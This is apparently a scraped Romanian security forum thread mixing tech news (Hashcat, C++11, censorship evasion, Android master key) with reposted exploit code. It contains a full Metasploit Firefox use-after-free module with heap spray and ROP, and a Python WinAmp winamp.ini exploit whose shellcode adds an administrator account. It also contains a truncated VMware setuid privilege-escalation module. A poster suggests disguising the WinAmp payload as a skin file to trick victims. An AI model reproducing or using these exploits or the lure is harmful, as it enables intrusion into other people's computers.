Nytro

Da, s-ar mai putea configura: 1. Intervalul la care sa verifice daca sunt posturi noi 2. Timeout-ul pentru acel popup Buna treaba.

Da, pacat ca e scris in Ruby.

Metasploit - The Exploit Learning Tree Author Mohan Santokhi This is a whitepaper called Metasploit - The Exploit Learning Tree. Instead of being just another document discussing how to use Metasploit, the purpose of this document is to show you how to look deeper into the code and try to decipher how the various classes and modules hang together to produce the various functions. # Reference 1 /documentation/developers_guide.pdf 2 http://dev.metasploit.com/documents/meterpreter.pdf 3 external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun_manual.pdf 4 www.nologin.org/Downloads/Papers/remote-library-injection.pdf 5 www.nologin.org/Downloads/Papers/win32-shellcode.pdf 6 Metasploit Unleashed 7 http://www.securitytube.net/groups?operation=view&groupId=10 2 Table of Contents 1 Document Control.................................................................................................................................. 2 1.1 Document Block ............................................................................................................................ 2 1.2 Change History ............................................................................................................................. 2 1.3 References .................................................................................................................................... 2 2 Table of Contents .................................................................................................................................. 3 3 Introduction............................................................................................................................................ 4 4 Setup ..................................................................................................................................................... 5 4.1 Getting started .................................................................................................................................... 5 4.2 Install Missing Gems ........................................................................................................................... 7 4.3 Test the environment .......................................................................................................................... 8 5 Exploit Metamodel ................................................................................................................................. 9 6 Vulnerable Service .............................................................................................................................. 11 7 msfconsole Initialisation Phase ............................................................................................................ 14 8 Use command ..................................................................................................................................... 16 9 Set command ...................................................................................................................................... 18 10 Exploit command ................................................................................................................................. 19 10.1 Create Payload Objects .................................................................................................................. 21 10.2 Generate Encoded Payload ............................................................................................................ 24 10.3 Start handler ................................................................................................................................... 24 10.4 Exploit The Target ........................................................................................................................... 25 10.5 Establish Session ............................................................................................................................ 26 10.6 Interact With Target ......................................................................................................................... 26 11 Meterpreter .......................................................................................................................................... 27 11.1 Meterpreter payloads ...................................................................................................................... 28 11.2 Client components .......................................................................................................................... 30 11.2.1 UI components ............................................................................................................................. 30 11.2.2 Command proxy components ....................................................................................................... 33 11.3 Meterpreter Protocol ....................................................................................................................... 35 11.3.1 Client side protocol API ................................................................................................................ 35 11.3.2 Server side protocol API ............................................................................................................... 37 11.4 Server components ......................................................................................................................... 38 11.5 Server extensions ........................................................................................................................... 41 12 Writing Meterpreter Extensions ............................................................................................................ 43 12.1 Design commands, requests and responses ................................................................................... 43 12.2 Implement skeleton extension ......................................................................................................... 45 12.3 Implement command dispatcher class ............................................................................................ 47 12.4 Implement command proxy class .................................................................................................... 47 13 Railgun ................................................................................................................................................ 48 13.1 Meterpreter scripts .......................................................................................................................... 52 Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/metasploit-the-learning-tree.pdf Sursa: Metasploit - The Exploit Learning Tree ? Packet Storm

[h=1]The Future is Here: C++ 11[/h] Publicat la 28.08.2013 Special Guest Lecture by C++ Inventor Bjarne Stroustrup

Conturile mai vechi, ca al meu, aveau deja 25 GB.

[h=1]Visual Studio 2013 IDE[/h] Posted: 16 hours ago By: Robert Green MP3 (Audio only) [h=3]File size[/h] 29.4 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 177.5 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 103.0 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 387.4 MB Mid Quality MP4 (Windows Phone, HTML5) [h=3]File size[/h] 271.3 MB High Quality WMV (PC, Xbox, MCE) In this episode, Robert is joined by Cathy Sullivan, who shows us some of the many enhancements to the Visual Studio 2013 development environment, including: Signing into the IDE to synchronize your settings [00:40] Notifications center [06:00] Improvements to overall look and feel [11:30] Auto brace completion [16:00] Enhanced scroll bar [18:45] Improved Navigate To experience [20:00] Peek Definition [22:00] CodeLenses [24:50] Video: Visual Studio 2013 IDE | Visual Studio Toolbox | Channel 9

[h=1]From the Archives: Erik Meijer and Mark Shields - Compiling MSIL to JS[/h] Posted: 1 day ago By: Charles High Quality WMV (PC, Xbox, MCE) MP3 (Audio only) MP4 (iPod, Zune HD) Mid Quality WMV (Lo-band, Mobile) This interview never shipped on C9, but why keep it hidden when we don't have to? From the archives, Erik Meijer and Mark Shields join us for a chat about compiling MSIL to JS. Erik!!! Tune in. Enjoy. Video: From the Archives: Erik Meijer and Mark Shields - Compiling MSIL to JS | Charles | Channel 9

[h=1]Hashcat Can Now Be Used to Crack 55-Character Passwords[/h] August 28th, 2013, 11:38 GMT · By Eduard Kovacs The developers of oclHashcat have released a new version of the popular password cracking tool. The latest release is capable of cracking passwords that are made of up to 55 characters. A lot of sensitive data is leaked these days by hackers. While in most cases the leaked passwords are encrypted, it’s becoming easier for cybercriminals to crack the hashes. The latest version of oclHashcat supports several new algorithms and GPUs. Various other changes have been implemented, but the most important is the fact that the tool can now be utilized to crack passwords that are longer than 15 characters. The developers admit that performance is negatively impacted by adding support for longer passwords. However, they claim this was “by far one of the most requested features.” “We can crack passwords up to length 55, but in case we're doing a combinator attack, the words from both dictionaries can not be longer than 31 characters. But if the word from the left dictionary has the length 24 and the word from the right dictionary is 28, it will be cracked, because together they have length 52,” Jens Steube, the lead Hashcat developer, wrote in the release notes. Sursa: Hashcat Can Now Be Used to Crack 55-Character Passwords

Evading Internet Censorship This research project by Brandon Wiley -- the tool is called "Dust" -- looks really interesting. Here's the description of his Defcon talk: Abstract: The greatest danger to free speech on the Internet today is filtering of traffic using protocol fingerprinting. Protocols such as SSL, Tor, BitTorrent, and VPNs are being summarily blocked, regardless of their legal and ethical uses. Fortunately, it is possible to bypass this filtering by reencoding traffic into a form which cannot be correctly fingerprinted by the filtering hardware. I will be presenting a tool called Dust which provides an engine for reencoding traffic into a variety of forms. By developing a good model of how filtering hardware differentiates traffic into different protocols, a profile can be created which allows Dust to reencode arbitrary traffic to bypass the filters. Dust is different than other approaches because it is not simply another obfuscated protocol. It is an engine which can encode traffic according to the given specifications. As the filters change their algorithms for protocol detection, rather than developing a new protocol, Dust can just be reconfigured to use different parameters. In fact, Dust can be automatically reconfigured using examples of what traffic is blocked and what traffic gets through. Using machine learning a new profile is created which will reencode traffic so that it resembles that which gets through and not that which is blocked. Dust has been created with the goal of defeating real filtering hardware currently deployed for the purpose of censoring free speech on the Internet. In this talk I will discuss how the real filtering hardware work and how to effectively defeat it. Download: http://blanu.net/Dust.pdf Sursa: https://www.schneier.com/blog/archives/2013/08/evading_interne.html

Firefox XMLSerializer Use After Free Authored by regenrecht, juan vazquez | Site metasploit.com This Metasploit module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically an use after free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This Metasploit module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox XMLSerializer Use After Free', 'Description' => %q{ This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically an use after free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3. }, 'License' => MSF_LICENSE, 'Author' => [ 'regenrecht', # Vulnerability Discovery, Analysis and PoC 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-0753' ], [ 'OSVDB', '89021'], [ 'BID', '57209'], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-006/' ], [ 'URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-16.html' ], [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=814001' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'PrependMigrate' => true }, 'Payload' => { 'BadChars' => "\x00", 'DisableNops' => true, 'Space' => 30000 # Indeed a sprayed chunk, just a high value where any payload fits }, 'Platform' => 'win', 'Targets' => [ [ 'Firefox 17 / Windows XP SP3', { 'FakeObject' => 0x0c101008, # Pointer to the Sprayed Memory 'FakeVFTable' => 0x0c10100c, # Pointer to the Sprayed Memory 'RetGadget' => 0x77c3ee16, # ret from msvcrt 'PopRetGadget' => 0x77c50d13, # pop # ret from msvcrt 'StackPivot' => 0x77c15ed5, # xcht eax,esp # ret msvcrt } ] ], 'DisclosureDate' => 'Jan 08 2013', 'DefaultTarget' => 0)) end def stack_pivot pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset return pivot end def junk(n=4) return rand_text_alpha(n).unpack("V").first end def on_request_uri(cli, request) agent = request.headers['User-Agent'] vprint_status("Agent: #{agent}") if agent !~ /Windows NT 5\.1/ print_error("Windows XP not found, sending 404: #{agent}") send_not_found(cli) return end unless agent =~ /Firefox\/17/ print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end # Fake object landed on 0x0c101008 if heap spray is working as expected code = [ target['FakeVFTable'], target['RetGadget'], target['RetGadget'], target['RetGadget'], target['RetGadget'], target['PopRetGadget'], 0x88888888, # In order to reach the call to the virtual function, according to the regenrecht's analysis ].pack("V*") code << [target['RetGadget']].pack("V") * 183 # Because you get control with "call dword ptr [eax+2F8h]", where eax => 0x0c10100c (fake vftable pointer) code << [target['PopRetGadget']].pack("V") # pop # ret code << [target['StackPivot']].pack("V") # stackpivot # xchg eax # esp # ret code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'}) js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch)) js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch)) js_ptr = Rex::Text.to_unescape([target['FakeObject']].pack("V"), Rex::Arch.endian(target.arch)) content = <<-HTML <html> <script> var heap_chunks; function heapSpray(shellcode, fillsled) { var chunk_size, headersize, fillsled_len, code; var i, codewithnum; chunk_size = 0x40000; headersize = 0x10; fillsled_len = chunk_size - (headersize + shellcode.length); while (fillsled.length <fillsled_len) fillsled += fillsled; fillsled = fillsled.substring(0, fillsled_len); code = shellcode + fillsled; heap_chunks = new Array(); for (i = 0; i<1000; i++) { codewithnum = "HERE" + code; heap_chunks[i] = codewithnum.substring(0, codewithnum.length); } } function gen(len, pad) { pad = unescape(pad); while (pad.length < len/2) pad += pad; return pad.substring(0, len/2-1); } function run() { var container = []; var myshellcode = unescape("#{js_code}"); var myfillsled = unescape("#{js_random}"); heapSpray(myshellcode,myfillsled); var fake = "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "#{js_ptr}"; var small = gen(72, fake); var text = 'x'; while (text.length <= 1024) text += text; var parent = document.createElement("parent"); var child = document.createElement("child"); parent.appendChild(child); child.setAttribute("foo", text); var s = new XMLSerializer(); var stream = { write: function() { parent.removeChild(child); child = null; for (i = 0; i < 2097152; ++i) container.push(small.toLowerCase()); } }; s.serializeToStream(parent, stream, "UTF-8"); } </script> <body onload="run();"> </body> </html> HTML print_status("URI #{request.uri} requested...") print_status("Sending HTML") send_response(cli, content, {'Content-Type'=>'text/html'}) end end Sursa: Firefox XMLSerializer Use After Free ? Packet Storm

Defcon 2013 - The Dawn Of Web 3.0: Website Mapping And Vulnerability Scanning In 3d, Just Like You Saw In The Movies Description: Remember that scene in Hackers where Jonny Lee Miller and Angelina Jolie get a bunch of hackers to attack Fisher Steven's network through vulnerabilities that they find while flying (literally) through Fisher's network? Even though it had no basis in reality at the time, it was still pretty awesome. This presentation will be like that, except real. This highly demo-focused presentation will unleash the next generation of web application visualization and security flaw detection. Created as part of DARPA's Cyber Fast Track, we have developed a completely awesome way of visualizing, in 3D, how massive numbers of web applications across the Internet are interconnected. This visualization engine provides a simple yet beautiful view of web applications and their vast, sprawling interconnections, all the while incorporating web application vulnerabilities into the visual metadata. Teal Rogers is a dedicated maker and software designer who has been advancing existing products through innovative new interfaces for years. Between being a brilliant imagineer, rogue inventor, warrior-poet, master of surprise, and student of the arcane he has managed to design and sell the highest quality laser gloves on the market. More recently, he has been inexorably drawn to the nascent power of the 3rd dimension. Alejandro Caceres is a computer network operations engineer focused on network offense software development and web application penetration testing and security. He is particularly interested in using distributed computing and offensive security principles to create cool/new/revolutionary open source and free applications with a global impact. Sursa: Defcon 2013 - The Dawn Of Web 3.0: Website Mapping And Vulnerability Scanning In 3d, Just Like You Saw In The Movies Kewl stuff

Kali Linux - Backdooring Windows 8 https://www.youtube.com/watch?feature=player_embedded&v=tlQf8VJgy70 Description: In this video you will learn how to exploit windows 8 using metasploit framework and how you can maintain your access on Windows 8 Using Kali Linux and metapsloit. Sursa: Kali Linux - Backdooring Windows 8

Gps Hacking Description: GPS Hacking For More Information please visit : Bsides Las Vegas 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) BSidesLV Sursa: Gps Hacking

Windows Universal Privilege Escalation Exploit Description: Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit demo Skiddie, dar poate util/necesar. Sursa: Windows Universal Privilege Escalation Exploit

Android Master Key Vulnerability—PoC Rohit T August 28, 2013 The recently discovered master key vulnerability in Android has given a jolt to the Android team and other parties involved. This vulnerability allows attackers to inject malicious code into legitimate Android applications without invalidating the digital signature. It’s very easy for hackers and attackers to take advantage of this vulnerability and exploit it. The news is already out that there are apps currently on the market that are exploiting this vulnerability. This was revealed at the recent Black Hat Conference 2013, although some researchers were able to publish the news a week before. So let’s look into what the issue is, how hackers can exploit it, and what needs to be done to fix it. How Does Android Code Signing Work? Android applications are .APK files (Android Packages), which are nothing but a collection of ZIP archives. For easy understanding, let us open up an APK file for an application and find out the same. Consider the application MyFirstApp.apk application which is signed by my certificate. Let us talk a little bit more about this signing process before we go ahead and understand the underlying issue. Android requires that all installed applications be digitally signed with a certificate whose private key is held by the application’s developer. Why would you want to sign the piece of code? For two reasons basically—authenticity and integrity. Before installing any application, I want to make sure that the application isn’t tampered with (integrity checking) and that it was created by the right person (authenticity checking). The Android system uses the certificate as a means of identifying the author of an application and establishing trust relationships between applications. The Android system will not install or run an application that is not signed. So, after building and application and signing it with a certificate, you basically have an APK file at the end. MyFirstApp.apk MyFirstApp.apk is a simple application (just a random application) and looks like this when installed on the emulator. APK files are nothing but collection of zip files. So if you rename an .apk extension as .zip you will be able to see the contents of the file. As you can see, the APK file consists of a subdirectory called META-INF, which contains signed checksums for all the other files in the package. The main manifest file (MANIFEST.MF) has entries with the file name and digest-value of each file in the archive. Now, if you modify any of the files in this package, Android will block the installation of the package to prevent the users from harmful activities. Android does this by verifying the checksum. In order to verify the checksum of each of these files, Android has to extract each of these files from the APK archive. This is accomplished using the Java unzipping library, which will parse the ZIP-format APK file, extract each file object, and match it up with the corresponding checksum mentioned in the manifest file in META-INF: Now try to modify any of these files; for example, modify the launch image file inside MyFirstApp.zip\res\drawable-hdpi folder, rebuild it, and try to install it on the device using the adb and you will find that Android rightly notices it and shows this message: How Is the Attack Accomplished? The vulnerability is based on the exploitation of the way in which Android verifies and installs the application. This helps in inserting code into the application without modifying the cryptographic signature. The attack successfully bypasses this verification process and installs the application with any changes the hacker embeds in the code. The attack is based on the concept of placing two different files in the APK archive with the same name. Regular ZIP software generally does not allow you to have two files with the same name in one archive. But the ZIP format itself doesn’t prevent duplicated filenames, and you can take advantage of this to create an archive with repeated file names as shown below. The ic_launcher.png file is something that I have added to the existing file and created a new APK file named HackedFile.zip. Now rename this file to HackedFile.apk and try to install it; you will observe that Android accepts it this time. It runs successfully without any complaints. Note that I was able to replace the launch image successfully without using any certificate and Android happily accepts the same. How Is This Even Possible? This is possible because Android verifies the first version of any file in archive but the installer verifies and extracts the last version of the file. Thus the legitimate file is checked by the cryptographic verifier and the one added by the hacker is installed by the installer. In simple words, what gets installed is a fake but what gets verified for signature is legitimate part. What Are the Implications? The implications are huge. The most important thing to note is that almost all versions of Android are vulnerable to this attack. The impact of this vulnerability and its exploitation is only limited by the imagination of a hacker. For instance, he can spy on your communication or he can go a step further and send premium rate SMS without the user’s knowledge, make background calls, take pictures and forward to mail, etc. Some of the built-in apps that come along with the phone have higher privileges than the other applications which are installed from the play store, so an attacker can take advantage of this and create apps that have system-level privileges. A Trojan application that is installed from a device application can access the entire Android system and their applications and their data. As explained by Jeff Forristal, an attacker can then create a botnet with the always internet connected mobile phones. The Bluebox team has successfully demonstrated this and changed the name of the kernel, etc. Symantec researchers have already discovered that the bug is being exploited in the wild by attackers by publishing popular games in third-party sites. Google has already released patches for this but, as everyone knows, it will certainly take some time for the handset makers to update all of their models. Google is now verifying all the applications in the play store to check for the master key vulnerability. But the other third-party stores and the side loading of apps aren’t going to help the cause. What Precautions Could Help Users to Stay Away from This? It’s important to download the apps only from the Google Play Store and, even while downloading from the play store, make sure that you verify the author of the application before downloading it. Do not install applications from untrusted sources or other Android stores. Similarly, say “No” to side loading of applications. In short, make sure you identify the publisher of the application before you install one. Google has already rolled out patches for this. Make sure you update your mobile with the latest patches available. Apart from these, an application also released in Play Store, “Blue Box Security Scanner,” will scan your device and let you know whether it is vulnerable to this Android master key vulnerability. Here is one screenshot of the program. Video Here is the video link that practically demonstrates how this can be accomplished: Sursa: Android Master Key Vulnerability—PoC

[h=1]WinAmp 5.63 (winamp.ini) - Local Exploit[/h] # Exploit Title: winampevilskin.py # Date: 25 August 2013 # Exploit Author: Ayman Sagy <aymansagy@gmail.com> # Vendor Homepage: http://www.winamp.com/ # Version: 5.63 # Tested on: Windows XP Professional SP3 Version 2002 # CVE : 2013-4694 # # Ayman Sagy <aymansagy@gmail.com> August 2013 # # This is an exploit for Bug #1 described in http://www.exploit-db.com/exploits/26558/ # Credit for discovering the vulnerability goes to Julien Ahrens from Inshell Security # # The exploit will generate a winamp.ini file that will cause winamp to run the payload upon startup # # # I tried an alpha3 encoded egghunter but could not fit it in a single buffer and unfortunately it did not work, it wrote an invalid address on the stack then tried to access it # If you can make it work or find a solution for ASLR/DEP please contact me # # So I wrote from scratch a venetian shellcode that will write the egghunter onto the stack then executes it # The egg and shellcode can be found in plain ASCII in memory # # Tested against Windows XP Pro SP3 # Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0 # run with Python 2.7 import sys, getopt, os def usage(): print('winampevilskin.py by Ayman Sagy <aymansagy@gmail.com>\n') print('Usage: python ' + sys.argv[0] + ' -p <payload>') print('Payload could be:') print('\t[user] to create new admin account ayman/P@ssw0rd') print('\t[calc] run calculator') print('for e.g.: python ' + sys.argv[0] + ' -p user') #appdata = os.environ['APPDATA'] # Windows add admin user: ayman P@ssw0rd scadduser = ( b"\xbf\xab\xd0\x9a\x5b\xda\xc7\xd9\x74\x24\xf4\x5a\x2b\xc9" + "\xb1\x45\x83\xc2\x04\x31\x7a\x11\x03\x7a\x11\xe2\x5e\x2c" + "\x72\xd2\xa0\xcd\x83\x85\x29\x28\xb2\x97\x4d\x38\xe7\x27" + "\x06\x6c\x04\xc3\x4a\x85\x9f\xa1\x42\xaa\x28\x0f\xb4\x85" + "\xa9\xa1\x78\x49\x69\xa3\x04\x90\xbe\x03\x35\x5b\xb3\x42" + "\x72\x86\x3c\x16\x2b\xcc\xef\x87\x58\x90\x33\xa9\x8e\x9e" + "\x0c\xd1\xab\x61\xf8\x6b\xb2\xb1\x51\xe7\xfc\x29\xd9\xaf" + "\xdc\x48\x0e\xac\x20\x02\x3b\x07\xd3\x95\xed\x59\x1c\xa4" + "\xd1\x36\x23\x08\xdc\x47\x64\xaf\x3f\x32\x9e\xd3\xc2\x45" + "\x65\xa9\x18\xc3\x7b\x09\xea\x73\x5f\xab\x3f\xe5\x14\xa7" + "\xf4\x61\x72\xa4\x0b\xa5\x09\xd0\x80\x48\xdd\x50\xd2\x6e" + "\xf9\x39\x80\x0f\x58\xe4\x67\x2f\xba\x40\xd7\x95\xb1\x63" + "\x0c\xaf\x98\xe9\xd3\x3d\xa7\x57\xd3\x3d\xa7\xf7\xbc\x0c" + "\x2c\x98\xbb\x90\xe7\xdc\x34\xdb\xa5\x75\xdd\x82\x3c\xc4" + "\x80\x34\xeb\x0b\xbd\xb6\x19\xf4\x3a\xa6\x68\xf1\x07\x60" + "\x81\x8b\x18\x05\xa5\x38\x18\x0c\xc6\xd3\x82\x81\x6d\x54" + "\x2e\xfe\x42\xc7\x90\x90\xf9\x73\xf1\x19\x72\x19\x83\xc1" + "\x15\x98\x0e\x63\xbb\x7a\x81\x23\x30\x08\x56\x94\xc4\x8a" + "\xb8\xfb\x69\x17\xfd\x23\x4f\xb1\xdd\x4d\xea\xc9\x3d\xfe" + "\x9b\x52\x5f\x92\x04\xe7\xf0\x1f\xba\x27\x4e\x84\x57\x41" + "\x3e\x2d\xd4\xe5\xcc\xcc\x6e\x69\x43\x7c\xae\x14\xda\xef" + "\xcf\xb8\x3c\xdf\x4e\x01\x79\x1f" ) # http://shell-storm.org/shellcode/files/shellcode-739.php sccalc = (b"\x31\xC9"+ # xor ecx,ecx "\x51"+ # push ecx "\x68\x63\x61\x6C\x63"+ # push 0x636c6163 "\x54"+ # push dword ptr esp "\xB8\xC7\x93\xC2\x77"+ # mov eax,0x77c293c7 "\xFF\xD0" ) if len(sys.argv) < 2: usage() exit(1) try: opts, args = getopt.getopt(sys.argv[1:],'p:') except getopt.GetoptError: usage() exit(1) for opt, arg in opts: if opt == '-p': if arg == 'user': shellcode = "aymnaymn" + "\x90" + "\x90" * 100 + scadduser + "\x90" * 89 elif arg == "calc": shellcode = "aymnaymn" + b"\x90" * 452 + b"\x90" + sccalc + b"\x90" * 23 else: print("Error: Invalid payload.\n") usage() sys.exit() #print(str(len(shellcode))) egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"+ "\xef\xb8\x61\x79\x6d\x6e\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") sploit = ( # Unicode-friendly venetian egghunter writer # Setup Registers "\x50\x72\x50"+ # push eax twice "\x72" + # align "\x59\x72\x5f"+ # pop ecx pop edi "\x72" + "\x05\xc2\x02\x01"+ # 05 00020001 ADD EAX,1000200 "\x72"+ "\x2d\xc2\x01\x01"+ # 2D 00010001 SUB EAX,1000100 # EAX is now EAX+100 "\x72\x48"+ # dec eax 4 times "\x72\x48"+ "\x72\x48"+ "\x72\x48\x72"+ # Pave Ahead # write NOPs in locations that will stop later execution "\xc3\x86\xc2\x90"+ # C600 90 MOV BYTE PTR DS:[EAX],90 "\x72\x40\x72"+ # 40 INC EAX "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x90"+ "\x72\x40\x72"+ "\xc2\x91" # 91 XCHG EAX,ECX "\x72" + # align # Start writing egghunter shellcode, EGG = aymn "\xc3\x86\x66"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x81"+ #81 "\x72\x40\x72"+ "\xc3\x86\xc3\x8a"+ #ca "\x72\x40\x72"+ "\xc3\x86\xc3\xbf"+ "\x72\x40\x72"+ "\xc3\x86\x0f"+ "\x72\x40\x72"+ "\xc3\x86\x42"+ # 42 "\x72\x40\x72"+ "\xc3\x86\x52"+ "\x72\x40\x72"+ "\xc3\x86\x6a"+ "\x72\x40\x72"+ "\xc3\x86\x02"+ "\x72\x40\x72"+ "\x34" * 4 + # Padding "\xc3\xb0\x30"+ # 0x003000F0 CALL EAX winamp.exe WinXP Pro SP3 # Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0 "\x72" "\xc3\x86\x58"+ #58 "\x72\x40\x72"+ "\xc3\x86\xc3\x8d"+ #cd "\x72\x40\x72"+ "\xc3\x86\x2e"+ #2e "\x72\x40\x72"+ "\xc3\x86\x3c"+ # 3c "\x72\x40\x72"+ "\xc3\x86\x05"+ # 5 "\x72\x40\x72"+ "\xc3\x86\x5a"+ "\x72\x40\x72"+ "\xc3\x86\x74"+ "\x72\x40\x72"+ "\xc3\x86\xc3\xaf"+ # ef "\x72\x40\x72"+ "\xc3\x86\xc2\xb8"+ "\x72\x40\x72"+ "\xc3\x86\x61"+ "\x72\x40\x72"+ "\xc3\x86\x79"+ "\x72\x40\x72"+ "\xc3\x86\x6d"+ "\x72\x40\x72"+ "\xc3\x86\x6e"+ "\x72\x40\x72"+ "\xc3\x86\xc2\x8b"+ "\x72\x40\x72"+ "\xc3\x86\xc3\xba"+ #fa "\x72\x40\x72"+ "\xc3\x86\xc2\xaf"+ # af "\x72\x40\x72"+ "\xc3\x86\x75"+ #75 "\x72\x40\x72"+ "\xc3\x86\xc3\xaa"+ #ea "\x72\x40\x72"+ "\xc3\x86\xc2\xaf"+ # af "\x72\x40\x72"+ "\xc3\x86\x75"+ #75 "\x72\x40\x72"+ "\xc3\x86\xc3\xa7"+ # e7 "\x72\x40\x72"+ "\xc3\x86\xc3\xbf"+ # ff "\x72\x40\x72"+ "\xc3\x86\xc3\xa7"+ # e7 "\x72"+ "\x57"+ # 57 PUSH EDI "\x72"+ # align "\xc3\x83"+ # C3 RETN "\x34" * 200 # Padding ) winamp = ("[Winamp]\r\nutf8=1\r\n" + "skin=" + sploit + "\r\n" "[WinampReg]\r\nIsFirstInst=0\r\nNeedReg=0\r\n" + "[in_wm]\r\nnumtypes=7\r\n" + "type0=WMA\r\ndescription0=Windows Media Audio File (*.WMA)\r\n" + "protocol0=0\r\navtype0=0\r\n" + "type1=WMV\r\ndescription1=Windows Media Video File (*.WMV)\r\n" + "protocol1=0\r\navtype1=1\r\ntype2=ASF\r\n" + "description2=Advanced Streaming Format (*.ASF)\r\n" + "protocol2=0\r\navtype2=1\r\ntype3=MMS://\r\n" + "description3=Windows Media Stream\r\nprotocol3=1\r\n" + "avtype3=1\r\ntype4=MMSU://\r\n" "description4=Windows Media Stream\r\nprotocol4=1\r\n" + "avtype4=1\r\ntype5=MMST://\r\n" + "description5=Windows Media Stream\r\nprotocol5=1\r\n" + "avtype5=1\r\ntype5=" + "\x90\x90\xe9\x0f" + "\r\ndescription6=" + shellcode + "\r\nprotocol6=0\r\navtype6=0\r\n") #f = open(appdata + "\Winamp\winamp.ini", "wb") or sys.exit("Error creating winamp.ini") f = open("winamp.ini", "wb") or sys.exit("Error creating winamp.ini") f.write(winamp) f.close() print("winamp.ini written, copy it into %APPDATA%\\Winamp") Sursa: WinAmp 5.63 (winamp.ini) - Local Exploit Pe Windows 7 nu mi-a mers. O sa incerc pe XP. Sugestie: Redenumiti fisierul in ".wsz" (Winamp Skin). Daca cineva da dublu click pe el, o sa il intrebe daca instaleaza skin-ul si ar trebui... sa se execute shellcode-ul. Si e posibil sa convingi pe cineva sa instaleze un nou skin de Winamp.

Pastreaza-le. Ban permanent, fara conturi de pe sisteme de plati sau banci.

VMWare Setuid vmware-mount Unsafe popen(3) Authored by Tavis Ormandy, egypt | Site metasploit.com VMWare Workstation (up to and including 9.0.2 build-1031769) and Player have a setuid executable called vmware-mount that invokes lsb_release in the PATH with popen(3). Since PATH is user-controlled, and the default system shell on Debian-derived distributions does not drop privs, we can put an arbitrary payload in an executable called lsb_release and have vmware-mount happily execute it as root for us. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' class Metasploit4 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::File def initialize(info={}) super( update_info( info, { 'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)', 'Description' => %q{ VMWare Workstation (up to and including 9.0.2 build-1031769) and Player have a setuid executable called vmware-mount that invokes lsb_release in the PATH with popen(3). Since PATH is user-controlled, and the default system shell on Debian-derived distributions does not drop privs, we can put an arbitrary payload in an executable called lsb_release and have vmware-mount happily execute it as root for us. }, 'License' => MSF_LICENSE, 'Author' => [ 'Tavis Ormandy', # Vulnerability discovery and PoC 'egypt' # Metasploit module ], 'Platform' => [ 'linux' ], 'Arch' => ARCH_X86, 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultOptions' => { "PrependSetresuid" => true, "PrependSetresgid" => true, }, 'Privileged' => true, 'DefaultTarget' => 0, 'References' => [ [ 'CVE', '2013-1662' ], [ 'OSVDB', '96588' ], [ 'BID', '61966'], [ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ], [ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ] ], 'DisclosureDate' => "Aug 22 2013" } )) # Handled by ghetto hardcoding below. deregister_options("PrependFork") end def check if setuid?("/usr/bin/vmware-mount") CheckCode::Vulnerable else CheckCode::Safe end end def exploit unless check == CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid") end # Ghetto PrependFork action which is apparently only implemented for # Meterpreter. # XXX Put this in a mixin somewhere # if(fork()) exit(0); # 6A02 push byte +0x2 # 58 pop eax # CD80 int 